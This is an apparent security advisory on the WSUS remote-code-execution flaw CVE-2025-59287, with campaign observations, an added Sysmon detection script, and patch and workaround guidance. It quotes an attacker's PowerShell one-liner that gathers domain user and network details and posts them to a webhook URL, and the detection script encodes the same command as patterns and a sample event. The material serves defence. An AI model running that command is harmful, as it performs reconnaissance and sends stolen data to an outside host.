Summary
On October 23, 2025, Microsoft released an out-of-band security update for a critical vulnerability tracked as CVE-2025-59287. The flaw stems from the deserialization of untrusted data in Windows Server Update Services (WSUS), which allows remote, unauthenticated threat actors to achieve remote code execution by sending a crafted event.
According to Microsoft, only Windows servers with the WSUS Server Role enabled are affected. This feature is not enabled by default.
While CVE-2025-59287 was originally patched in October’s Patch Tuesday update, Microsoft has indicated that the initial patch was not comprehensive, and this new update must be applied to fully mitigate the vulnerability. Threat actors have begun exploiting this vulnerability, which was added to CISA’s Known Exploited Vulnerabilities Catalog shortly after the new patch was released. Additionally, technical details and a proof-of-concept exploit are now available for CVE-2025-59287.
Threat Activity Targeting WSUS Servers
Arctic Wolf is currently observing a threat campaign targeting WSUS servers over ports 8530 and 8531. We are not able to fully confirm if this campaign is directly related to CVE-2025-59287 at this time.
In each incident, a malicious PowerShell script was executed in a cmd process spawned by the IIS worker process (w3wp.exe) or by wsusservice.exe. The injected command executes net user /domain and ipconfig /all and sends the output to a domain controlled by a threat actor.
try{$r= (&{echo https://REDACTED_IP:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w=\"http://webhook[.]site/REDACTED\";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl[.]exe -k $w --data-binary $r}
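The process-creation pattern described above (a cmd/PowerShell child of w3wp.exe or wsusservice.exe running domain recon and posting the output to a webhook) can be checked against Sysmon Event ID 1 records. The following detection script is an added example, not Arctic Wolf tooling; the event field names follow Sysmon's schema and the sample events are constructed.

```python
# Added example (not Arctic Wolf's own tooling): scan Sysmon Event ID 1
# (process creation) records for the WSUS pattern described above, i.e. a
# cmd/powershell child of w3wp.exe or wsusservice.exe whose command line
# carries the recon and exfiltration indicators. Sample events are constructed.
import re

WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
INDICATORS = {  # taken from the observed script
    "recon_net_user": re.compile(r"net\s+user\s+/domain", re.I),
    "recon_ipconfig": re.compile(r"ipconfig\s+/all", re.I),
    "exfil_webhook": re.compile(r"webhook\.site", re.I),
    "exfil_http_put": re.compile(r"(iwr|invoke-webrequest).*-method\s+put", re.I),
    "exfil_curl": re.compile(r"curl(\.exe)?\s.*--data-binary", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze(event):
    """Classify one Sysmon EID 1 event as 'alert', 'review' or 'ok'."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    matched = [n for n, rx in INDICATORS.items() if rx.search(event.get("CommandLine", ""))]
    wsus_spawned_shell = parent in WSUS_PARENTS and child in SHELL_CHILDREN
    if wsus_spawned_shell and matched:
        verdict = "alert"        # WSUS process ran a shell with campaign indicators
    elif wsus_spawned_shell or len(matched) >= 2:
        verdict = "review"       # unusual parent, or recon+exfil pairing elsewhere
    else:
        verdict = "ok"
    return {"verdict": verdict, "parent": parent, "child": child, "indicators": matched}

# Constructed sample events; the first is modelled on the observed (defanged) script.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c powershell -c "try{$r=(&{net user /domain; ipconfig /all}|out-string)}'
                    r'catch{};$w=\"http://webhook.site/REDACTED\";iwr -UseBasicParsing -Uri $w -Body $r -Method Put"'},
    {"ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c dir"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c ipconfig /all"},
]

def scan(events=SAMPLE_EVENTS):
    return [analyze(e) for e in events]
```

Feed `scan()` the parsed EventData of your Sysmon EID 1 events; any "review" hit on a WSUS host is worth triage even without the command-line indicators, since those processes should not normally spawn a shell.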
Recommendations for CVE-2025-59287
Upgrade to Latest Fixed Versions
Arctic Wolf strongly recommends that customers upgrade to the latest fixed versions of Windows Server to properly mitigate CVE-2025-59287 as recommended by Microsoft.
| Affected Product | Update Article |
|---|---|
| Windows Server 2025 | |
| Windows Server 2022, 23H2 Edition | |
| Windows Server 2022 | |
| Windows Server 2019 | |
| Windows Server 2016 | |
| Windows Server 2012 R2 | |
| Windows Server 2012 | |
Install Arctic Wolf Agent & Sysmon
Arctic Wolf Agent and Sysmon provide Arctic Wolf with visibility into events needed to identify activity related to this campaign.
- For instructions on how to install Arctic Wolf Agent, see the below install guides:
- If you have a supported EDR solution deployed in your environment, please configure it for monitoring with Arctic Wolf.
Note: Arctic Wolf recommends following change management best practices for deploying Agent and Sysmon, including testing changes in a testing environment before deploying to production.
Workaround (Optional)
For users who are unable to immediately apply the October 23, 2025, out-of-band update, Microsoft has provided the following mitigations until the update can be applied:
- Since only Windows servers with the WSUS Server Role enabled are vulnerable to CVE-2025-59287, disabling WSUS will mitigate the vulnerability. Note that clients will not receive updates from the server if WSUS is disabled.
- Block inbound traffic to ports 8530 and 8531 on the host firewall (as opposed to blocking only at the network or perimeter firewall) to render WSUS non-operational.